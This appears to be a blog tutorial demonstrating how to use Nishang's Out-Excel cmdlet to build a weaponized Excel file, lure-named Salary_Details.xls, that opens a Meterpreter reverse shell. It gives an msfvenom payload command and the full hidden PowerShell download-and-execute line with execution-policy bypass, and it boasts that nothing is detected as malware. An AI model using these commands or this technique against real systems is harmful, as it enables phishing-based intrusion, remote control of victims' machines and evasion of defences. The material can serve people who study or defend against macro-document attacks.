Nishang has a set of client side attack scripts designed to weaponize office documents. Here is quick demo using Nishang’s PowerShell Cmdlet, Out-Excel, to generate an Excel file that contains code to download and execute a meterpreter payload. I’m using Kali to generate and serve the payload, and my Windows machine will be playing the role of attacker and victim for ease of demo.
- On Kali, generate the Meterpreter payload, start a webserver, and copy the payload to the web root: msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.201 -f psh-reflection > ps_payload32.ps1
- On Kali, start a listener:
- On your Windows (attacker) machine, import the Nishang module and use the Get-Excel Cmdlet to create a weaponized Excel spreadsheet. If you don’t have Nishang, you can get it here: https://github.com/samratashok/nishang.
Disregard the error message when importing. The Out-Excel Cmdlet generates an Excel file (Salary_Details.xls) and inserts VB script to have it connect to the server that is hosting the payload, specified in the PayloadURL parameter.
Now, I’ll play the part of victim and double-click the Salary_Details.xls spreadsheet. The VB code in the spreadsheet will start powershell, download the payload, and execute it. And then I get my meterpreter:
As of now, nothing gets detected as malware. The payload is running in memory and the Excel file is benign. The payload of the Excel file is just this simple script:
“powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile -c IEX ((New-Object Net.WebClient).DownloadString(‘http://192.168.0.201/ps_payload32.ps1’));”
As you can see, it invokes powershell, provides options that hides the window and attempts to circumvent any execution policies, and then passes a command that downloads the payload from the server. The IEX command is an alias for the Cmdlet Invoke-Expression, which executes the downloaded string, which in this case is the powershell meterpreter.